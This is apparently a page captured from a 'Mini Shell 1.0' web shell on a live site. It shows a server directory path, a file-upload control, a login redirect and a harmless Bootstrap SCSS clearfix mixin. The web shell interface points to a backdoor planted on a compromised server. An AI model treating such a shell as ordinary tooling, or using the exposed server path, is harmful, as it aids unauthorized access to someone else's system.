HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/lapieza.do/assets/scss/vendors/bootstrap/mixins/
Upload File :
Current File : /var/www/lapieza.do/assets/scss/vendors/bootstrap/mixins/_clearfix.scss
// scss-docs-start clearfix
@mixin clearfix() {
  &::after {
    display: block;
    clear: both;
    content: "";
  }
}
// scss-docs-end clearfix